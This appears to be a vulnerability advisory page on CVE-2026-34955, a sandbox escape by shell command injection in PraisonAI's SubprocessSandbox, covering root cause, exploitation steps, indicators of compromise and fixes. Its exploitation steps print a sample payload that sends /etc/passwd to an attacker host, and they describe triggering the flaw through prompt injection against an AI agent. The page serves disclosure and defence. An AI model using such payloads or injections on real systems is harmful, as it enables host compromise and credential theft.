CVE-2026-34955: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-34955 is a sandbox escape vulnerability in PraisonAI's SubprocessSandbox component, allowing OS command injection by bypassing an incomplete command blocklist. It affects all SubprocessSandbox modes (BASIC, STRICT, NETWORK_ISOLATED) in PraisonAI versions up to and including 4.5.96. The vulnerability was published on March 31, 2026, by the maintainer and added to the GitHub Advisory Database on April 1, 2026. The GitHub Advisory assigns a CVSS v3.1 score of 8.8 (High) with a local attack vector, while Feedly's threat intelligence estimates a score of 10.0 (Critical) with a network attack vector, reflecting differing assessments of reachability (GitHub Advisory, PraisonAI Advisory).

Technical details

The root cause (CWE-78: OS Command Injection) lies in sandbox_executor.py, where SubprocessSandbox.execute() passes user-supplied commands to subprocess.run() with shell=True (line 326), meaning the underlying shell (/bin/sh) is always invoked regardless of the configured sandbox mode. The blocklist check at line 179 extracts the first token of the command and compares it against a set of blocked command names, but sh and bash are absent from this list. Additionally, the dangerous pattern checks for pipe-based shell invocations (e.g., | sh) require a leading space, meaning id|bash evades detection. An attacker can trivially bypass all sandbox restrictions by prefixing any blocked command with sh -c '...', as demonstrated in the public PoC (GitHub Advisory, PraisonAI Advisory).

Impact

Successful exploitation renders the --sandbox strict mode entirely ineffective, giving an attacker unrestricted access to the OS as the process user. Commands blocked by policy — including curl, wget, nc, and ssh — become trivially reachable, enabling network egress, filesystem access, and queries to cloud metadata services (e.g., AWS IMDSv1). When combined with agent prompt injection, a remote attacker can chain this vulnerability to achieve full host compromise, lateral movement within cloud environments, and exfiltration of secrets or credentials (GitHub Advisory, PraisonAI Advisory).

Exploitability

A public proof-of-concept (PoC) exploit is available in the GitHub Security Advisory, consisting of a short, self-contained Python script that directly instantiates SubprocessSandbox in STRICT mode and executes sh -c 'id' to demonstrate the escape (PraisonAI Advisory). As of the time of reporting, there is no confirmed evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.02% (5th percentile), indicating a currently low probability of active exploitation within 30 days. The vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).

Exploitation steps

  1. Identify target: Locate a PraisonAI deployment running version ≤ 4.5.96 with the subprocess sandbox enabled (e.g., launched with --sandbox strict). This may be exposed via an agent API endpoint or accessible through prompt injection in an AI agent workflow.
  2. Craft the bypass payload: Construct a command that uses sh or bash as the top-level executable, which is absent from the blocklist. For example: sh -c 'curl http://attacker.com/exfil?data=$(cat /etc/passwd)'.
  3. Inject the payload: Submit the crafted command to the SubprocessSandbox.execute() method — either directly via API, or indirectly by injecting a malicious prompt into an agent that causes it to invoke the sandbox with attacker-controlled input.
  4. Achieve sandbox escape: Because subprocess.run() is called with shell=True, the system shell (/bin/sh) interprets the full command string. The blocklist check passes since sh is not blocked, and the shell executes the inner command without restriction.
  5. Post-exploitation: Use the unrestricted shell access to exfiltrate data, establish reverse shells, access cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/), or pivot to other services reachable from the host (GitHub Advisory, PraisonAI Advisory).

Indicators of compromise

  • Process: Unexpected child processes spawned by the PraisonAI Python process with names sh, bash, curl, wget, nc, or ssh; processes executing commands like id, whoami, or uname from within the agent runtime.
  • Network: Outbound HTTP/HTTPS connections from the PraisonAI host to unknown external IPs or domains; requests to cloud metadata endpoints (e.g., 169.254.169.254) originating from the agent process; DNS lookups for attacker-controlled domains.
  • Logs: Application logs showing SubprocessSandbox.execute() calls with arguments beginning with sh -c or bash -c; absence of SecurityError exceptions despite policy-restricted commands being executed.
  • File System: New files written to the PraisonAI working directory or /tmp by the agent process; unexpected cron jobs, SSH authorized keys, or scripts created under the service account's home directory.

Mitigation and workarounds

Upgrade PraisonAI to version 4.5.97 or later, which patches this vulnerability (GitHub Advisory). The recommended code-level fix is to replace subprocess.run(command, shell=True, ...) with subprocess.run(shlex.split(command), shell=False, ...), which prevents shell interpretation and eliminates the bypass vector. As an interim workaround, add sh and bash to the blocked_commands list and switch from a blocklist to an allowlist approach for permitted commands. Additionally, consider deploying OS-level sandboxing (e.g., seccomp, namespaces, or containers) as a defense-in-depth measure independent of the application-layer sandbox (PraisonAI Advisory).

Community reactions

The vulnerability was reported by security researcher YeranG30 and disclosed responsibly through GitHub's security advisory process (GitHub Advisory). The Hacker Wire published a dedicated write-up on the sandbox escape (The Hacker Wire), and a broader community post on dev.to discussed CVE-2026-34955 as part of a series of seven CVEs discovered in PraisonAI within 48 hours, highlighting systemic security weaknesses in AI agent frameworks. The vulnerability was also discussed on Reddit's r/pwnhub and shared on Mastodon and Bluesky, generating moderate community attention given its critical-severity potential when combined with prompt injection.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management